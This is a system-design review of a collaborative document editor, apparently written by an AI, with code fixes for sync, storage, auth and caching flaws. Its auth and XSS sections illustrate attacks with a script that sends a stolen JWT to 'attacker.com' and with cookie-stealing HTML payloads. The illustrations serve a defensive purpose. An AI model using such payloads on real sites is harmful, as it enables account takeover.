Here's the architecture for a real-time collaborative document editor (like Google Docs):

**System Overview:**
- Frontend: React SPA with WebSocket connections
- Backend: Node.js API servers behind a load balancer (round-robin)
- Database: PostgreSQL for document storage, Redis for session cache
- Real-time: Each API server maintains its own WebSocket connections to clients
- Sync Strategy: Last-write-wins with timestamps from client clocks
- Storage: Documents saved as full HTML snapshots every 30 seconds
- Auth: JWT tokens with 24-hour expiry, stored in localStorage
- CDN: CloudFront for static assets, also caches API responses for 5 minutes

**Data Flow:**
1. User types → change event sent via WebSocket to their connected server
2. Server writes change to PostgreSQL
3. Server broadcasts change to all WebSocket clients connected to THAT server
4. Other servers poll PostgreSQL every 2 seconds for changes
5. Conflict resolution: if two users edit the same paragraph, last timestamp wins

**Scaling Plan:**
- Horizontal scaling by adding more API servers
- Database read replicas for read-heavy operations
- Document partitioning by organization ID

Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs.
This architecture has critical flaws that will cause data loss, security vulnerabilities, and poor user experience at scale. I've identified 18 distinct issues across 6 categories. Several are severe enough to cause silent data corruption in production today.
**Last-write-wins with client clock timestamps**
Severity: CRITICAL — Silent data loss in production
Scenario demonstrating the problem:
─────────────────────────────────────────────────────
User A (clock: accurate)      User B (clock: 5 min slow)
─────────────────────────────────────────────────────
12:00:00 - Types "Hello"      12:00:30 - Types "World"
                              (B's clock is behind, so the
                              recorded timestamp is 11:55:30,
                              EARLIER than A's)

Result: "Hello" wins because it has the later timestamp,
BUT User B typed after User A in wall-clock time.

Worse scenario:
User B's laptop has its clock skewed +1 hour.
User B can now PERMANENTLY win every conflict
for an entire hour, silently discarding all other
users' changes with no indication to anyone.
─────────────────────────────────────────────────────
The deeper problem: LWW at the paragraph level means any concurrent edit to the same paragraph results in one user's work being silently discarded. There's no merge, no notification, no recovery.
Solution: Operational Transformation (OT) or CRDTs
// Current broken approach
function resolveConflict(changeA, changeB) {
  // Silent data loss - one change disappears forever
  return changeA.clientTimestamp > changeB.clientTimestamp
    ? changeA
    : changeB;
}
// Better approach: Vector clocks for causal ordering
class VectorClock {
  constructor(nodeId) {
    this.nodeId = nodeId;
    this.clock = {}; // { userId: counter }
  }

  increment() {
    this.clock[this.nodeId] = (this.clock[this.nodeId] || 0) + 1;
    return { ...this.clock };
  }

  // Merge clocks when receiving a remote event
  merge(remoteClock) {
    for (const [node, time] of Object.entries(remoteClock)) {
      this.clock[node] = Math.max(this.clock[node] || 0, time);
    }
  }

  // Returns: 'before' | 'after' | 'concurrent' | 'equal'
  compare(otherClock) {
    let aAheadOfB = false;
    let bAheadOfA = false;
    const allNodes = new Set([
      ...Object.keys(this.clock),
      ...Object.keys(otherClock)
    ]);
    for (const node of allNodes) {
      const aTime = this.clock[node] || 0;
      const bTime = otherClock[node] || 0;
      if (aTime > bTime) aAheadOfB = true;
      if (bTime > aTime) bAheadOfA = true;
    }
    if (aAheadOfB && !bAheadOfA) return 'after';
    if (bAheadOfA && !aAheadOfB) return 'before';
    if (aAheadOfB && bAheadOfA) return 'concurrent'; // True conflict
    return 'equal';
  }
}
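For example, two edits made independently on different nodes compare as 'concurrent', which is exactly the case LWW silently destroys:

// Usage sketch of the VectorClock class above
const a = new VectorClock('userA');
const b = new VectorClock('userB');
a.increment(); // a.clock = { userA: 1 }
b.increment(); // b.clock = { userB: 1 }

a.compare(b.clock); // 'concurrent' → neither edit causally precedes the other
a.merge(b.clock);   // a.clock = { userA: 1, userB: 1 }
a.compare(b.clock); // 'after' → a's state now dominates b's view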
// Production recommendation: Use CRDT library (Yjs or Automerge)
// Yjs example - handles all of this automatically:
import * as Y from 'yjs'
const ydoc = new Y.Doc()
const ytext = ydoc.getText('document')
// This merge is mathematically guaranteed to converge
// to the same result on all clients regardless of
// operation order or network delays
ytext.insert(0, 'Hello') // User A
ytext.insert(5, ' World') // User B - both changes preserved
Trade-offs:
| Approach | Correctness | Complexity | Bandwidth |
|---|---|---|---|
| LWW (current) | ❌ Data loss | Low | Low |
| OT | ✅ Correct | Very High | Medium |
| CRDT (Yjs) | ✅ Correct | Medium (library) | Higher |
| CRDT (Automerge) | ✅ Correct | Medium (library) | Highest |
Recommendation: Use Yjs — battle-tested, used by major editors, handles offline sync, has existing WebSocket provider.
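As a sketch of how little wiring that takes (assuming the `y-websocket` provider package and a hypothetical server endpoint):

import * as Y from 'yjs'
import { WebsocketProvider } from 'y-websocket'

// One shared doc per document ID; the provider syncs it over WebSocket
const ydoc = new Y.Doc()
const provider = new WebsocketProvider(
  'wss://collab.example.com', // hypothetical endpoint
  'doc-42',                   // room name = document ID
  ydoc
)

const ytext = ydoc.getText('document')
ytext.observe(() => {
  // Re-render the editor from ytext, or bind via an editor integration
})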
**Full HTML snapshots every 30 seconds as primary storage**
Severity: HIGH — Data loss window + storage explosion
Problems with this approach:
┌─────────────────────────────────────────────────────────┐
│ User types for 29 seconds → server crashes              │
│ Result: 29 seconds of work LOST with no warning         │
│                                                         │
│ Storage growth example:                                 │
│ Document: 50KB HTML, snapshot every 30 seconds          │
│ 50KB × 2 snapshots/min × 1,440 min/day ≈ 144MB/day/doc  │
│ For 1,000 active documents ≈ 144GB/day                  │
│                                                         │
│ No change history = no undo beyond browser state        │
│ No audit trail = compliance nightmare                   │
└─────────────────────────────────────────────────────────┘
Solution: Operation log with periodic compaction
// Store operations, not snapshots
const schema = `
  -- Append-only operation log
  CREATE TABLE document_operations (
    id BIGSERIAL PRIMARY KEY,
    document_id UUID NOT NULL,
    user_id UUID NOT NULL,
    op_type TEXT NOT NULL, -- 'insert' | 'delete' | 'format'
    position INTEGER,
    content TEXT,
    attributes JSONB,
    vector_clock JSONB NOT NULL,
    created_at TIMESTAMPTZ DEFAULT NOW()
  );

  -- Efficient queries for sync (PostgreSQL has no inline INDEX
  -- syntax in CREATE TABLE, so these are separate statements)
  CREATE INDEX idx_doc_ops ON document_operations (document_id, id);
  CREATE INDEX idx_doc_ops_since ON document_operations (document_id, created_at);

  -- Periodic snapshots for fast loading (not primary storage)
  CREATE TABLE document_snapshots (
    document_id UUID NOT NULL,
    snapshot_at BIGINT NOT NULL, -- operation ID at snapshot time
    content JSONB NOT NULL,
    created_at TIMESTAMPTZ DEFAULT NOW(),
    PRIMARY KEY (document_id, snapshot_at)
  );
`;
class DocumentStorage {
  async applyOperation(docId, operation) {
    return await this.db.transaction(async (trx) => {
      // Write the operation to the log
      const [op] = await trx('document_operations')
        .insert({
          document_id: docId,
          ...operation,
          vector_clock: JSON.stringify(operation.vectorClock)
        })
        .returning('*');

      // Check if we should create a snapshot
      // (every 1000 ops or 10 minutes, whichever comes first;
      // see the sketch below)
      await this.maybeSnapshot(docId, op.id, trx);
      return op;
    });
  }

  async loadDocument(docId, sinceOpId = null) {
    if (sinceOpId) {
      // Incremental sync: only fetch ops since the last known state
      return await this.db('document_operations')
        .where('document_id', docId)
        .where('id', '>', sinceOpId)
        .orderBy('id', 'asc');
    }

    // Full load: find the nearest snapshot, then apply subsequent ops
    const snapshot = await this.db('document_snapshots')
      .where('document_id', docId)
      .orderBy('snapshot_at', 'desc')
      .first();

    const ops = await this.db('document_operations')
      .where('document_id', docId)
      .where('id', '>', snapshot?.snapshot_at ?? 0)
      .orderBy('id', 'asc');

    return { snapshot, ops };
  }
}
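`maybeSnapshot` is referenced above but not shown; one plausible sketch of the op-count half of that policy (the 10-minute timer would live elsewhere, and the `materialize` helper is assumed):

class DocumentStorage {
  // ...
  async maybeSnapshot(docId, latestOpId, trx) {
    const last = await trx('document_snapshots')
      .where('document_id', docId)
      .orderBy('snapshot_at', 'desc')
      .first();

    const lastSnapshotOpId = last?.snapshot_at ?? 0;
    if (latestOpId - lastSnapshotOpId < 1000) return; // Not enough new ops yet

    // Materialize current state by replaying ops onto the last snapshot
    // (materialize is a hypothetical helper, not shown here)
    const content = await this.materialize(docId, lastSnapshotOpId, trx);
    await trx('document_snapshots').insert({
      document_id: docId,
      snapshot_at: latestOpId,
      content: JSON.stringify(content)
    });
  }
}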
Trade-offs:
| Approach | Data-loss window | History/undo/audit | Read path | Storage |
|---|---|---|---|---|
| Full snapshots (current) | Up to 30 seconds | None | Read one row | Grows with doc size × frequency |
| Op log + snapshots | None (every op durable) | Full | Snapshot + replay | Compact, but needs a compaction job |
**Cross-server sync via 2-second PostgreSQL polling**
Severity: HIGH
Current polling behavior:
─────────────────────────────────────────────────────────
Server A (User A connected)     Server B (User B connected)
─────────────────────────────────────────────────────────
User A types "H"
  → Saved to PostgreSQL
                                Server B polls... (0-2s wait)
                                User B sees "H" appear
                                (up to 2 seconds of delay)

At scale:
  10 servers × 1 poll/2 sec × 1,000 documents = 5,000 queries/sec
  just for polling, before any real work
─────────────────────────────────────────────────────────
Solution: Redis Pub/Sub for cross-server broadcasting
// Replace polling with event-driven pub/sub
import { createClient } from 'redis';
import { WebSocket } from 'ws'; // for the OPEN readyState constant

class RealtimeSync {
  constructor() {
    // Separate clients required - a connection in subscriber mode
    // can't issue other Redis commands
    this.publisher = createClient();
    this.subscriber = createClient();
    this.localSockets = new Map(); // docId → Set<WebSocket>
  }

  async initialize() {
    await this.publisher.connect();
    await this.subscriber.connect();
    // Subscribe to ALL document channels on this server;
    // pattern subscription avoids per-document subscriptions
    await this.subscriber.pSubscribe(
      'doc:*',
      (message, channel) => {
        const docId = channel.replace('doc:', '');
        this.broadcastToLocalClients(docId, JSON.parse(message));
      }
    );
  }

  async publishChange(docId, change) {
    // Broadcast to all servers instantly (no polling delay)
    await this.publisher.publish(
      `doc:${docId}`,
      JSON.stringify({
        ...change,
        serverId: process.env.SERVER_ID, // Identifies the origin server
        timestamp: Date.now()
      })
    );
  }

  broadcastToLocalClients(docId, change) {
    const sockets = this.localSockets.get(docId);
    if (!sockets) return;
    const message = JSON.stringify(change);
    for (const socket of sockets) {
      // Skip the originating user's own connection (prevents echo)
      if (socket.userId !== change.userId && socket.readyState === WebSocket.OPEN) {
        socket.send(message);
      }
    }
  }

  // Track which documents have clients on this server
  registerClient(docId, socket) {
    if (!this.localSockets.has(docId)) {
      this.localSockets.set(docId, new Set());
    }
    this.localSockets.get(docId).add(socket);
  }

  deregisterClient(docId, socket) {
    this.localSockets.get(docId)?.delete(socket);
  }
}
Latency comparison:
Polling (current): 0ms ──────────────── 2000ms (average 1000ms)
Redis Pub/Sub: 0ms ── ~5ms (typical Redis latency)
Trade-offs: Redis Pub/Sub is fire-and-forget; a server briefly disconnected from Redis misses messages, so clients still need revision numbers to detect gaps and catch up from the operation log. Redis also becomes a hard dependency of the real-time path. In exchange, propagation latency drops from ~1s average to single-digit milliseconds and the polling load on PostgreSQL disappears entirely.
**Concurrent edits diverge without OT/CRDT**
Severity: HIGH — Causes document divergence between clients
Divergence scenario with current architecture:
──────────────────────────────────────────────────────────
Document state: "AC"
User A: insert 'B' at position 1 → "ABC" (op: ins(1,'B'))
User B: insert 'X' at position 1 → "AXC" (op: ins(1,'X'))
Both ops sent simultaneously. Server applies A then B:
ins(1,'B') → "ABC"
ins(1,'X') → "AXBC" ← Server state
User A receives B's op: ins(1,'X') applied to "ABC"
→ "AXBC" ✓ (accidentally correct here)
But User B receives A's op: ins(1,'B') applied to "AXC"
→ "ABXC" ✗ ← DIVERGED from server's "AXBC"
Users are now looking at different documents with no indication.
──────────────────────────────────────────────────────────
Solution: Server-side operation transformation
// Simplified OT for insert/delete operations
// (Production: use ShareDB or Yjs which handle this correctly)
class OperationTransformer {
  // Transform operation A against operation B.
  // Returns A' such that: apply(apply(doc, B), A') = apply(apply(doc, A), B')
  transform(opA, opB) {
    if (opA.type === 'insert' && opB.type === 'insert') {
      return this.transformInsertInsert(opA, opB);
    }
    if (opA.type === 'insert' && opB.type === 'delete') {
      return this.transformInsertDelete(opA, opB);
    }
    if (opA.type === 'delete' && opB.type === 'insert') {
      return this.transformDeleteInsert(opA, opB);
    }
    if (opA.type === 'delete' && opB.type === 'delete') {
      return this.transformDeleteDelete(opA, opB);
    }
  }

  transformInsertInsert(opA, opB) {
    // If B inserts before A's position (ties broken by user ID), shift A right
    if (opB.position < opA.position ||
        (opB.position === opA.position && opB.userId < opA.userId)) {
      return { ...opA, position: opA.position + opB.content.length };
    }
    return opA; // B inserts after A, no adjustment needed
  }

  transformInsertDelete(opA, opB) {
    if (opB.position < opA.position) {
      // B deleted content before A's insert point
      return { ...opA, position: opA.position - opB.length };
    }
    return opA;
  }

  // ... additional transform cases (delete/insert, delete/delete,
  // overlapping ranges) omitted for brevity
}

class DocumentServer {
  constructor() {
    this.transformer = new OperationTransformer();
    // Server maintains the authoritative operation history
    this.opHistory = new Map(); // docId → Operation[]
  }

  async applyOperation(docId, incomingOp) {
    let history = this.opHistory.get(docId);
    if (!history) {
      history = [];
      this.opHistory.set(docId, history);
    }

    // Find operations that happened concurrently with this one
    // (all ops the client hadn't seen when they sent this op)
    const concurrentOps = history.slice(incomingOp.knownRevision);

    // Transform the incoming op against all concurrent ops
    let transformedOp = incomingOp;
    for (const concurrentOp of concurrentOps) {
      transformedOp = this.transformer.transform(transformedOp, concurrentOp);
    }

    // Apply the transformed op and assign an authoritative revision
    transformedOp.revision = history.length;
    history.push(transformedOp);
    return transformedOp; // Send this to all other clients
  }
}
Recommendation: Don't implement OT from scratch — use ShareDB (OT-based, battle-tested) or Yjs (CRDT-based, simpler mental model). Both handle all these edge cases.
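For a sense of how small the ShareDB surface is, a minimal sketch (the collection and document names are hypothetical; production would add a database adapter and auth middleware):

import ShareDB from 'sharedb';

const backend = new ShareDB(); // In production, back with a persistent DB adapter
const connection = backend.connect();
const doc = connection.get('documents', 'doc-42');

doc.fetch((err) => {
  if (err) throw err;
  if (doc.type === null) {
    // Create with the default JSON0 OT type
    doc.create({ content: '' }, (err) => { if (err) throw err; });
  }
});

// Later: submit a JSON0 string-insert at offset 0 of the 'content' field.
// ShareDB transforms it against concurrent ops server-side.
doc.submitOp([{ p: ['content', 0], si: 'Hello' }]);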
**JWT stored in localStorage**
Severity: CRITICAL — Complete account takeover possible
Attack vector:
─────────────────────────────────────────────────────────
1. Attacker finds XSS vulnerability (e.g., in document
content rendered without sanitization — likely given
this stores HTML)
2. Malicious script injected:
fetch('https://attacker.com/steal?token=' +
localStorage.getItem('jwt_token'))
3. Attacker now has valid 24-hour JWT
4. Can impersonate user, access all documents
5. User has NO way to invalidate it (JWTs are stateless)
─────────────────────────────────────────────────────────
Solution: HttpOnly cookies + token rotation
// Server-side: Set tokens in HttpOnly cookies
app.post('/auth/login', async (req, res) => {
  const user = await authenticateUser(req.body);
  const accessToken = generateAccessToken(user, '15m'); // Short-lived
  const refreshToken = generateRefreshToken(user);      // Long-lived

  // Store the refresh token in the DB for revocation capability
  await db('refresh_tokens').insert({
    token_hash: hash(refreshToken),
    user_id: user.id,
    expires_at: new Date(Date.now() + 30 * 24 * 60 * 60 * 1000),
    created_at: new Date()
  });

  // HttpOnly = JavaScript cannot access this cookie
  // Secure   = HTTPS only
  // SameSite = CSRF protection
  res.cookie('access_token', accessToken, {
    httpOnly: true,
    secure: true,
    sameSite: 'strict',
    maxAge: 15 * 60 * 1000 // 15 minutes
  });
  res.cookie('refresh_token', refreshToken, {
    httpOnly: true,
    secure: true,
    sameSite: 'strict',
    path: '/auth/refresh', // Only sent to the refresh endpoint
    maxAge: 30 * 24 * 60 * 60 * 1000
  });
  res.json({ user: sanitizeUser(user) }); // No token in the response body
});

// Silent token refresh before expiry
app.post('/auth/refresh', async (req, res) => {
  const refreshToken = req.cookies.refresh_token;
  if (!refreshToken) return res.status(401).json({ error: 'No refresh token' });

  // Look the token up by hash alone, so we can distinguish
  // "unknown token" from "already-rotated token" (replay attack)
  const stored = await db('refresh_tokens')
    .where('token_hash', hash(refreshToken))
    .first();

  if (!stored || stored.expires_at <= new Date()) {
    return res.status(401).json({ error: 'Invalid refresh token' });
  }

  if (stored.revoked_at) {
    // A rotated-out token was replayed - possible theft.
    // Revoke every session for this user.
    await revokeAllUserSessions(stored.user_id);
    return res.status(401).json({ error: 'Invalid refresh token' });
  }

  // Rotate the refresh token (this is what enables replay detection above)
  await db('refresh_tokens')
    .where('id', stored.id)
    .update({ revoked_at: new Date() });

  const newAccessToken = generateAccessToken(stored.user_id, '15m');
  const newRefreshToken = generateRefreshToken(stored.user_id);
  await db('refresh_tokens').insert({
    token_hash: hash(newRefreshToken),
    user_id: stored.user_id,
    expires_at: new Date(Date.now() + 30 * 24 * 60 * 60 * 1000)
  });

  res.cookie('access_token', newAccessToken, {
    httpOnly: true, secure: true, sameSite: 'strict', maxAge: 15 * 60 * 1000
  });
  res.cookie('refresh_token', newRefreshToken, {
    httpOnly: true, secure: true, sameSite: 'strict', path: '/auth/refresh',
    maxAge: 30 * 24 * 60 * 60 * 1000
  });
  res.json({ ok: true });
});
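On the client side, the silent-refresh loop becomes trivial; a minimal sketch (the 14-minute period is an assumption tied to the 15-minute access token above):

// Refresh shortly before the access token expires.
// The cookies are HttpOnly, so this code's only job is timing.
function scheduleTokenRefresh() {
  setInterval(async () => {
    const res = await fetch('/auth/refresh', {
      method: 'POST',
      credentials: 'include' // send the HttpOnly refresh cookie
    });
    if (!res.ok) {
      // Refresh token expired or revoked - force re-login
      window.location.href = '/login';
    }
  }, 14 * 60 * 1000);
}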
Trade-offs: HttpOnly cookies close the XSS token-theft vector, and the server-side token table makes sessions revocable. The costs are a refresh endpoint, CSRF considerations (mitigated here with SameSite=strict), and extra friction for non-browser clients that must manage cookies instead of an Authorization header.
**Documents stored and rendered as raw HTML (stored XSS)**
Severity: CRITICAL
// Current: storing and rendering raw HTML is dangerous
// A user can embed: <script>stealAllDocuments()</script>
// Or: <img src="x" onerror="exfiltrate(document.cookie)">
// Solution: Never store or render raw HTML
// Use a structured document format instead
// Store as structured JSON (like ProseMirror/Slate schema)
const documentSchema = {
  type: 'doc',
  content: [
    {
      type: 'paragraph',
      attrs: { align: 'left' },
      content: [
        { type: 'text', text: 'Hello world', marks: [{ type: 'bold' }] }
      ]
    }
  ]
};
// When rendering, use a whitelist-based renderer
// that ONLY renders known-safe node types
class SafeRenderer {
  ALLOWED_NODES = new Set(['doc', 'paragraph', 'text', 'heading',
                           'bulletList', 'listItem', 'codeBlock']);
  ALLOWED_MARKS = new Set(['bold', 'italic', 'underline', 'code', 'link']);
  ALLOWED_LINK_PROTOCOLS = new Set(['https:', 'http:', 'mailto:']);

  render(node) {
    if (!this.ALLOWED_NODES.has(node.type)) {
      console.warn(`Blocked disallowed node type: ${node.type}`);
      return ''; // Drop unknown nodes entirely
    }
    // ... render each node type explicitly
  }

  renderMark(mark, content) {
    if (!this.ALLOWED_MARKS.has(mark.type)) return content;
    if (mark.type === 'link') {
      let url;
      try {
        url = new URL(mark.attrs.href); // throws on malformed URLs
      } catch {
        return content; // Drop the link, keep the text
      }
      if (!this.ALLOWED_LINK_PROTOCOLS.has(url.protocol)) return content;
      // rel="noopener noreferrer" prevents tab-napping
      // (escapeHtml is defined below)
      return `<a href="${escapeHtml(mark.attrs.href)}" rel="noopener noreferrer" target="_blank">${content}</a>`;
    }
    // ... other marks
  }
}
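The `escapeHtml` helper used above isn't shown; a standard implementation:

function escapeHtml(str) {
  return str
    .replace(/&/g, '&amp;')   // must run first, before other entities
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}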
**CDN caches authenticated API responses**
Severity: CRITICAL
Catastrophic scenario:
─────────────────────────────────────────────────────────
User A: GET /api/documents/secret-doc
→ CloudFront caches response for 5 minutes
User B (different org, no access): GET /api/documents/secret-doc
→ CloudFront serves cached response ← CONFIDENTIAL DATA LEAK
─────────────────────────────────────────────────────────
Solution: Never cache authenticated API responses at CDN
// Middleware to set correct cache headers on ALL API responses
app.use('/api', (req, res, next) => {
  // Prevent any caching of API responses
  res.set({
    'Cache-Control': 'no-store, no-cache, must-revalidate, private',
    'Pragma': 'no-cache',
    'Surrogate-Control': 'no-store', // CDN-specific header (e.g. Fastly)
    'CDN-Cache-Control': 'no-store'  // Targeted CDN header (RFC 9213); support varies by CDN
  });
  next();
});

// The CDN should ONLY cache:
// - Static assets (JS, CSS, images) → long cache + content-hash filenames
// - Public, unauthenticated content
// - Never anything with an Authorization header or session cookies

// CloudFront behavior configuration (infrastructure as code):
const cloudFrontConfig = {
  behaviors: [
    {
      pathPattern: '/api/*',
      cachePolicyId: 'CACHING_DISABLED',  // AWS managed policy
      originRequestPolicyId: 'ALL_VIEWER' // Forward all headers
    },
    {
      pathPattern: '/static/*',
      cachePolicyId: 'CACHING_OPTIMIZED'
      // Static assets use content-hash filenames: main.a3f8b2.js
      // Safe to cache for 1 year
    }
  ]
};
**No WebSocket reconnection strategy**
Severity: HIGH — Changes lost on any network hiccup
Current behavior on disconnect:
─────────────────────────────────────────────────────────
User types 500 chars → network blip for 3 seconds
→ WebSocket drops
→ Those 500 chars are GONE (never reached server)
→ User doesn't know
→ User continues typing on now-stale document
→ Reconnects to DIFFERENT server (round-robin LB)
→ Server has no knowledge of this client's state
→ Document state is now inconsistent
─────────────────────────────────────────────────────────
Solution: Client-side operation queue with acknowledgments
class ResilientWebSocketClient {
  constructor(url, documentId) {
    this.url = url;
    this.documentId = documentId;
    this.pendingOps = []; // Ops sent but not acknowledged
    this.unsentOps = [];  // Ops not yet sent
    this.lastServerRevision = 0;
    this.reconnectDelay = 1000;
    this.maxReconnectDelay = 30000;
    this.connected = false;
  }

  connect() {
    this.ws = new WebSocket(this.url);

    this.ws.onopen = () => {
      this.connected = true;
      this.reconnectDelay = 1000; // Reset backoff
      // Rejoin the document with the last known state;
      // the server can send us everything we missed
      this.ws.send(JSON.stringify({
        type: 'rejoin',
        documentId: this.documentId,
        lastKnownRevision: this.lastServerRevision
      }));
      // Resend any unacknowledged operations
      this.flushPendingOps();
    };

    this.ws.onmessage = (event) => {
      const msg = JSON.parse(event.data);
      if (msg.type === 'ack') {
        // Server confirmed receipt - remove from pending
        this.pendingOps = this.pendingOps.filter(op => op.id !== msg.opId);
        this.lastServerRevision = msg.revision;
      } else if (msg.type === 'operation') {
        this.handleRemoteOperation(msg);
      } else if (msg.type === 'catchup') {
        // Server sending us ops we missed during the disconnect
        msg.operations.forEach(op => this.handleRemoteOperation(op));
      }
    };

    this.ws.onclose = () => {
      this.connected = false;
      this.scheduleReconnect();
    };

    this.ws.onerror = (error) => {
      console.error('WebSocket error:', error);
      // onclose will fire after onerror, triggering reconnect
    };
  }

  sendOperation(op) {
    const envelope = {
      ...op,
      id: generateId(), // defined below
      clientRevision: this.lastServerRevision
    };
    if (this.connected) {
      this.pendingOps.push(envelope);
      this.ws.send(JSON.stringify(envelope));
    } else {
      // Queue for when the connection restores
      this.unsentOps.push(envelope);
    }
  }

  flushPendingOps() {
    // Resend ops that were sent but not acknowledged
    for (const op of this.pendingOps) {
      this.ws.send(JSON.stringify(op));
    }
    // Send ops that were queued while disconnected
    for (const op of this.unsentOps) {
      this.pendingOps.push(op);
      this.ws.send(JSON.stringify(op));
    }
    this.unsentOps = [];
  }

  scheduleReconnect() {
    setTimeout(() => {
      this.reconnectDelay = Math.min(
        this.reconnectDelay * 2, // Exponential backoff
        this.maxReconnectDelay
      );
      this.connect();
    }, this.reconnectDelay + Math.random() * 1000); // Jitter prevents thundering herd
  }
}
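`generateId` is assumed above; any collision-resistant ID works. A minimal usage sketch (endpoint and document ID are hypothetical):

function generateId() {
  return crypto.randomUUID(); // built into modern browsers
}

const client = new ResilientWebSocketClient('wss://collab.example.com/ws', 'doc-42');
client.connect();
client.sendOperation({ type: 'insert', position: 0, content: 'H' });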
**Round-robin load balancing breaks WebSocket affinity**
Severity: HIGH
Round-robin load balancing with WebSockets:
─────────────────────────────────────────────────────────
Client connects to Server A → WebSocket established
Client's HTTP request (token refresh) → routed to Server B
Server B has no WebSocket context for this client
Server A goes down → client reconnects to Server B
Server B has no document state for this client
─────────────────────────────────────────────────────────
Solution: Sticky sessions OR stateless WebSocket servers
Option 1: Sticky sessions (simpler, less resilient)
─────────────────────────────────────────────────────────
Load Balancer config:
- Hash client IP or session ID
- Always route same client to same server
- Problem: server failure still drops all its connections
- Problem: uneven load distribution
Option 2: Stateless WebSocket servers (recommended)
─────────────────────────────────────────────────────────
All connection state stored in Redis:
- Active document sessions
- Client cursor positions
- Pending operations per client
- Any server can handle any client
┌─────────┐     ┌─────────────────────────────────┐
│ Client  │────▶│ Any WebSocket Server            │
└─────────┘     │ (stateless - reads from Redis)  │
                └──────────────┬──────────────────┘
                               │
                    ┌──────────▼──────────┐
                    │   Redis Cluster     │
                    │ - Session state     │
                    │ - Pub/Sub channels  │
                    │ - Op queues         │
                    └─────────────────────┘
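To make "stateless" concrete, a minimal sketch of Redis-backed session state (key names and fields are illustrative, not part of the original design):

// Sketch: per-client session state in Redis, so any server can resume it.
class SessionStore {
  constructor(redis) {
    this.redis = redis;
    this.TTL = 60; // seconds; refreshed while the client is alive
  }

  async saveSession(clientId, state) {
    await this.redis.setEx(
      `session:${clientId}`,
      this.TTL,
      JSON.stringify({
        documentId: state.documentId,
        lastAckedRevision: state.lastAckedRevision,
        cursor: state.cursor
      })
    );
  }

  async resumeSession(clientId) {
    const raw = await this.redis.get(`session:${clientId}`);
    return raw ? JSON.parse(raw) : null; // null → client does a full rejoin
  }
}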
**PostgreSQL used as a message bus**
Severity: HIGH — Will become bottleneck at scale
Current write pattern per keystroke:
─────────────────────────────────────────────────────────
User types one character:
1. INSERT into document_changes (PostgreSQL write)
2. 9 other servers poll SELECT (PostgreSQL reads × 9)
3. Repeat for every character typed by every user
At 100 concurrent users typing at 3 chars/sec:
- 300 writes/sec
- 300 × (N-1) polling reads (grows with server count)
- At 10 servers: 2,700 reads/sec just for polling
- Polling reads compete with document load queries
─────────────────────────────────────────────────────────
Solution: Separate concerns — PostgreSQL for durability, Redis for real-time
Revised data flow:
─────────────────────────────────────────────────────────
User types → WebSocket → Server
├──▶ Redis Pub/Sub (real-time broadcast, ~1ms)
└──▶ Operation log buffer
│
└──▶ Batch write to PostgreSQL
(every 100ms or 50 ops)
─────────────────────────────────────────────────────────
Benefits:
- Real-time path: Redis only (fast, no DB load)
- Durability path: PostgreSQL (batched, efficient)
- Separation allows independent scaling
class OperationBuffer {
  constructor() {
    this.buffer = new Map(); // docId → Operation[]
    // Catch rejections so a failed flush can't crash the process
    this.flushInterval = setInterval(
      () => this.flush().catch(err => console.error('Flush failed:', err)),
      100
    );
    // Flush on shutdown to prevent data loss
    process.on('SIGTERM', async () => {
      clearInterval(this.flushInterval);
      await this.flush();
      process.exit(0);
    });
  }

  add(docId, operation) {
    if (!this.buffer.has(docId)) {
      this.buffer.set(docId, []);
    }
    this.buffer.get(docId).push(operation);
    // Immediate flush if the buffer is large
    if (this.buffer.get(docId).length >= 50) {
      this.flushDocument(docId).catch(err => console.error('Flush failed:', err));
    }
  }

  async flush() {
    const promises = [];
    for (const docId of this.buffer.keys()) {
      promises.push(this.flushDocument(docId));
    }
    await Promise.all(promises);
  }

  async flushDocument(docId) {
    const ops = this.buffer.get(docId);
    if (!ops || ops.length === 0) return;
    this.buffer.set(docId, []); // Clear before the async write to avoid double-writes

    try {
      // A bulk insert is much more efficient than individual inserts
      await db('document_operations').insert(ops);
    } catch (error) {
      // Put the ops back in the buffer for retry
      const current = this.buffer.get(docId) || [];
      this.buffer.set(docId, [...ops, ...current]);
      throw error;
    }
  }
}
**Org-based partitioning creates hot partitions**
Severity: MEDIUM
Problem with org-based partitioning:
─────────────────────────────────────────────────────────
Google (org_id: 1) has 50,000 employees all editing docs
→ All their data on one partition → overloaded
Startup (org_id: 2) has 5 employees
→ Their partition is nearly idle
Result: Uneven load, one partition becomes bottleneck
regardless of adding more hardware
─────────────────────────────────────────────────────────
Solution: Composite partition key with consistent hashing
-- Partition by document_id (UUID) for even distribution
-- Keep org_id for efficient org-level queries via an index
CREATE TABLE documents (
  id UUID DEFAULT gen_random_uuid(),
  org_id UUID NOT NULL,
  title TEXT,
  created_at TIMESTAMPTZ DEFAULT NOW()
) PARTITION BY HASH (id); -- Even distribution regardless of org size

-- Create partitions
CREATE TABLE documents_p0 PARTITION OF documents
  FOR VALUES WITH (modulus 8, remainder 0);
-- ... through documents_p7

-- Efficient org-level queries are still possible via an index
CREATE INDEX idx_documents_org ON documents (org_id, created_at DESC);

-- For the operation log, partition by time range;
-- this enables efficient pruning of old operations
CREATE TABLE document_operations (
  id BIGSERIAL,
  document_id UUID NOT NULL,
  created_at TIMESTAMPTZ DEFAULT NOW()
  -- ... other columns
) PARTITION BY RANGE (created_at);

-- Monthly partitions enable easy archival
CREATE TABLE document_operations_2024_01
  PARTITION OF document_operations
  FOR VALUES FROM ('2024-01-01') TO ('2024-02-01');
**No database connection pooling**
Severity: MEDIUM
// Without connection pooling, each server opens many DB connections.
// PostgreSQL has hard limits (~100-500 connections by default).
// 20 servers × 50 connections each = 1,000 connections → PostgreSQL
// starts refusing new connections.

// Solution: PgBouncer as connection pooler
// Architecture:
//   App Servers → PgBouncer (transaction pooling) → PostgreSQL
//
// PgBouncer in transaction mode:
//   - 20 servers can share a small pool of actual DB connections
//   - Connections are returned to the pool after each transaction
//   - PostgreSQL sees a manageable connection count

// Application configuration
import { Pool } from 'pg';

const pool = new Pool({
  host: 'pgbouncer',             // Point to PgBouncer, not PostgreSQL directly
  max: 10,                       // Per-server pool size (PgBouncer multiplexes these)
  idleTimeoutMillis: 30000,
  connectionTimeoutMillis: 2000,
  statement_timeout: 5000,       // Fail fast instead of piling up slow queries
});
// Caveat: PgBouncer transaction mode doesn't support session state
// (named prepared statements, SET, advisory locks) - avoid them.

// Monitor pool health
pool.on('error', (err) => {
  logger.error('Unexpected pool error', err);
  metrics.increment('db.pool.error');
});
